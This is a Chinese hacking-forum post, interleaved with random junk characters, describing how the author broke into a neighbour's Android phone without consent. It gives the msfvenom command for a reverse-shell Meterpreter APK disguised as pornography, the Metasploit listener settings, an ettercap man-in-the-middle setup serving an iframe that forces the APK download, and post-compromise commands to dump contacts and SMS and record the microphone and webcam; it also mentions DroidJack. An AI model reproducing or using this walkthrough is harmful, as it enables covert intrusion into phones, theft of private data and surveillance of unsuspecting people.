找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1826|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( {. T1 t, |$ M* x 五、msf+ettercap入侵邻居安卓手机 7 p& @% k1 O% \1 Y; v

" C( u. R# o$ ?2 T3 d

* Y5 T; ]$ }; O8 ~" L8 Z: G7 R0 k+ r; W 首先启动msf 2 ?' R, ?# E0 R" b$ G( O+ R: ^) p

l0 g3 U6 s! o6 [

2 {8 x. D, }9 _ 先用kali生成一个安卓木马,如下命令: 9 D8 r$ d5 L& \8 b1 |) Z

1 S {* t- r% o# p7 Y: h

K. H/ R' }2 }7 k* ]: I Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk $ {! A* z( r6 O W. }

1 S" t/ M: B4 n( J' }$ P

, t9 G. D! s# A7 ^ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 : F' o4 D4 h B8 P0 D. d1 e, F0 J9 X

/ M' b/ a) h; }: e

. |; D3 D# x9 u x 然后进入msf ; A. u& T& r2 O6 j& W6 x p" V2 S

! K- f6 q/ G7 P+ l" ^6 ]% I( x

3 `& @, ^! X/ l7 _, Q! ~% v use exploit/multi/handler 0 N9 ?* {) U/ h f) R( P

0 f2 |( R( N) X# E' z# T. E% f

7 u; [9 g* t: Q" h. [( s7 m set payload android/meterpreter/reverse_tcp 0 H2 J2 e1 b5 o

7 o9 _9 E9 k% K2 x1 s/ C: ^

/ r2 {) E/ a- \/ B/ G set LHOST 192.168.0.109 //ipkailiip . p9 U k. Q) i

. q' |7 E4 z4 e" ~& i( R" H% L- y

. B E5 G+ c& _ set LPORT 44444 //端口一定要与前面生成的木马的端口一致 0 S: u( D0 s$ x4 J. N) c" B7 G

; |" u5 E! @& g ~! o- z+ Y

8 u% e9 c/ u: j! u, _7 I Exploit . s4 h. u7 T2 Y3 v

* U* J% O6 k+ l2 Y3 K5 b

. v0 G' E: C% g- T( H* b8 ^   , s7 U$ s `" ?8 |

1 u6 o6 w2 I! H Y

' E- v8 K8 A# O! k; \& k9 q 下面我们开启ettercap -G - e, s! d8 b9 x" |4 Y/ n, z

( l( e% ], B/ Z. ^2 c' p9 u( l

- x! _0 `9 R7 z; w 我物理IP # r1 j/ ]/ B# y* f/ b; f' g

1 K0 y; f9 C9 U3 y! ^7 j0 `

# J4 H3 r! f% f, `* X   % c) [; v& a1 Q+ I9 q

; f3 y$ t$ T8 R4 ?

8 l. I& X% }. {7 I$ i& N# p5 z 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, / G7 s$ D: }6 B0 r0 f/ N P

! Q1 v7 g4 `' G* N$ y$ Q; r

) {- C: ^3 e- R% Y T f 下面我们来设置一下 ( C, k8 {/ h; w/ U1 y. [

4 H0 s s1 @+ C4 T& r5 H. u

9 @8 |: b+ T2 {   / o2 x! m- H5 K) a; o

* T2 C% o) J/ ~6 u/ O

# p' b5 w! o0 x+ R: i3 b 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, , y! f7 E( M- C, w

3 f5 w$ \! P- \) Y) @

0 n, E5 V5 J/ ?& [. k   4 r3 k+ Z- j4 y; w. n$ E" M3 f# n

- a9 X& x& [- h* r0 G

3 v7 r& i! ]- C5 p$ ?   5 S1 `) L" v0 N) c* Q

9 }2 H* e2 H% x: {* m

+ l$ B _& M! \! a* n   9 @! s$ |; {; W! l* Z

3 k. t! t) @# ]8 o) R; P

) H' N+ l2 a6 W! W L5 G$ h8 ~   * j- h( q9 g, d: {

' O- g+ o" F0 G0 b ^. c1 |

0 |& Q4 e" C2 f# U0 ~8 {' L   8 K# T. V2 ?( S9 {

5 T8 |4 o7 t# s0 z/ Q1 i8 ^4 L9 j

. J1 z+ \9 A6 x& W1 c2 a9 P) k' q   x2 |/ M/ n2 C: X

: f3 a' ]7 K% a! r b

5 Y# W5 n k: [2 a% T Q0 c4 L   1 v/ D& k4 [6 l6 o. K: ^) J$ K

' p* |3 s5 o# w& h( L

8 H$ [# A+ F. D8 l   8 _ I. y+ c: x3 A! T5 M

8 T4 w+ C) Q6 X, d. `

/ [5 N& g) w: ~1 o2 f" U* S) F! ^" I   " ^- `) H9 e. ]/ G

& [. d+ | u) F

( M w( }, Q4 [; [! y7 L2 B8 G. x   ' I! M2 P! K0 S3 g+ V! p7 w. F, y& Q

/ a) j) w. H' \9 L

0 l r4 y- W+ } p1 t3 p7 l |   8 J9 C8 o3 c1 g6 c$ U' ~

$ N" c# ^' R8 h% E( F8 @8 `

; p* @! Z2 A3 X/ m/ u   , ^, u x5 o# Z! E: I" p' z o

& U3 ~) m; T* R- K1 Y0 N- Q

, t" z3 T2 ?, h! u: E2 J   / G i: H1 Q- C) {1 X% N

- w1 U z0 V/ S6 j, C0 ^

O5 @+ ]3 D. q9 j% f' u) v% D 下面我们开始攻击 + w. p' b1 U0 L. Y, w/ z6 r$ j

3 `/ J. B% g& B

+ ?$ f: G# M5 e8 C F   0 B! A! Z! [ S: \/ l: B6 g$ a

0 N& T- B% r% h8 T* g8 E

; {" r9 M- ~. H7 T. S1 g: Q   ! C0 i/ J8 g& k5 |

# F! `5 Z( w2 x

- k7 l: M: R# V6 u   1 _7 n6 E) b4 b) t5 X

: a y5 J, k8 j1 O% k

- r% Y# ` H3 g5 l% b0 Q1 C# _   & D! B* P i$ P7 m* y5 I

7 m- q$ i' U" l* w. |

' P3 A9 y( Z- [' |* ?& ^' t   O j! l. T0 d$ Z% i4 r

/ V7 H) p& q9 |, |# f' z

* D+ o, `2 h C 大概过了5分钟多,发现反弹成功了 * p, M5 V2 X O' ]; G% o: {

1 t9 y/ D) U. M0 a" N

2 V. t0 @7 O# G1 B   - ~; @% w* B5 Q

% i6 h/ ^, P# `% L

4 M: `0 V: G% Y0 i7 }7 t   6 ~/ ?( w q4 f, r h0 m1 J6 e* C

3 [8 O' p% ?1 Q/ k% K2 p" h

! l: b2 f; y% O: M( N   $ n- O, }' T( d+ E

- d. o" v. n" ?9 q$ W; K4 w2 B

& e% }6 ]1 C" n+ D, y$ ~2 y   , T! W$ _# i/ |4 B' \2 ^% u

* `. e0 U1 j6 I' l# d( Z

6 n0 H/ G$ y* A& l; F0 N   . O% p+ c; z) W8 L

" X( E( o3 ]5 ]2 E- }: S, O0 @

% {7 ^+ Z3 J) Z   + J B4 E9 G. K- Q

4 V+ r( ]9 e% d$ \5 s0 w) _' \

. ]- n: ~- t+ P$ t   # X8 p( s8 j8 Q( M1 H

; G# }! e7 z: x" \: Q( p q

8 P& s3 @0 _5 H3 u; n 执行命令 % P G0 Q' t5 c8 ]6 l

7 z1 s7 y/ \5 c7 i* O

1 P7 ]5 [1 s: {% C8 m% O   ! _" l: n B/ }: @) E6 m

. j- X7 i0 N, ^6 o- P

& y( R6 H2 Y' S6 V' I! o dump_contacts    --》这个是导出电话 3 z: z0 k* ^* r/ e1 h" J

: [" J; x6 ]3 h4 v

: T8 A3 |# H2 T' u* } dump_sms --》这个是导出信息 " i2 w% h6 d. u1 q3 k$ c

( ^) I% v/ i8 w( [7 G8 i

; u1 |% T8 ]5 k7 k/ _) i+ o record_mic     Record audio from the default microphone for X seconds 6 s+ o3 m4 B5 _! ?# |' c; {

U0 V f0 \1 W! x* M& _8 R

; m- i7 z; i) D( U- @1 F' r& w     webcam_chat    Start a video chat 5 q0 T: E6 p, Y D+ ]" h9 Z/ }) @- K

3 z$ t) M# b, O0 {( {6 T1 z

* m3 F, t2 \/ u6 o) F     webcam_list    List webcams ' z+ y& t& T* N( X" U" _1 c7 T1 o, D

/ N& d5 e! \# Y* G

( U+ F/ f/ q$ a- ~% \. G     webcam_snap    Take a snapshot from the specified webcam , q) U8 t# _& ]8 T

0 @4 X. v/ l2 W# J: `

7 U V' r) V) { webcam_stream  lay a video stream from the specified webcam - Q2 {8 X- h3 n- b+ n

% @2 x# N5 `% {; Q7 E. t

1 Q. h I1 q+ O; ~7 j* ^   L2 q T& U0 @

9 t3 i) W! |' P4 B

, y" _# m2 N5 R5 Q# @) d* X" }   4 x2 M0 G7 o' W( o7 F) k# o$ C

$ N2 V5 @( ] M. a

}. R6 E+ z" Q: w( J, i 我们打开看一下电话薄, 9 F' E0 `- r! i# f+ M

. V: z3 C9 q: ]8 Z4 e7 C+ E7 n

* B5 Z) g. m" D3 H   5 Z& g4 M, X6 [) R

1 x4 V1 W+ x, k

7 Y% B, a& d- B Y2 x8 f   7 I s* o0 X! X5 u9 @

, X/ ~8 V9 k8 r+ c( C- a

# i9 X$ z# O1 F/ Z   : y" }- I4 K; b5 T7 I" ? x6 [4 b

7 {+ l; O, y, ]4 m" U3 A

3 q4 M% z* p% u0 G+ D+ c   ) P7 P3 y6 F8 r( o

! V" L* S, k; F: Q6 G; E; o$ U

' }( H% e; U2 w8 I   % ^' _* l4 o. a4 n) Y; u& w$ e+ s

- a# K4 r/ b3 i

- j0 C. x& _0 F+ n) ]! }3 c   6 m# s1 G0 F! S1 k! @2 ]4 V

0 d5 t5 D9 p4 ^0 P8 W- J7 f p

0 E$ Q1 I" `- o( M* q; C 我们同时欺骗成DroidJack木马,使用方法如图: 8 K7 O0 _$ F4 P& ]

4 X* C/ A; P9 Z/ \* K* d4 Y( Z

; S d7 D4 a E   3 G3 ^3 @! h* i. p

t: U* o7 P. O- M4 P( b0 e& y

# u2 B0 m/ m* @( G9 g1 ?7 z   8 Q2 \( V* A9 u' i8 n2 ?8 C1 p/ C

/ y$ R9 }. B3 l( {$ w. V

& |+ l1 [6 e/ z: j) w6 ]- v   ! M4 O2 \! N' g+ v; @# R* |# K$ h

4 R. m/ g! |" ~: O& F' j4 n/ Y

5 Q( z/ C" Y: k& B" f5 }( R* L& _4 a H 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 , f) R I! C# W1 F

6 e# i t& Y; o

0 y+ G; T% L }) h! N1 L2 T6 I/ X/ l/ h   1 j' Z F1 Y1 ]6 v8 j1 q; |2 @6 Y

/ U2 Z, T4 B' r% v3 J- T& I

8 S) L" @$ G# M; U- ^3 g: {, S   5 Y* k; m D0 p

3 T1 H8 E4 K# E- _' D2 w, U

5 P0 x) j: `5 {% z" l' i7 ]! ^   ! y' U; J9 e2 P" p9 _! @6 Q

% y6 ]2 l; J J0 f

" W# B5 k2 d+ p% C7 A" P9 P) V1 _. [" F 1 n( y i% r4 B: V7 _; i

" Y4 z4 c; Z# g. v1 o7 E

& Q4 l: Q& d! X, s. { J
k' F& l6 S' |, x

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表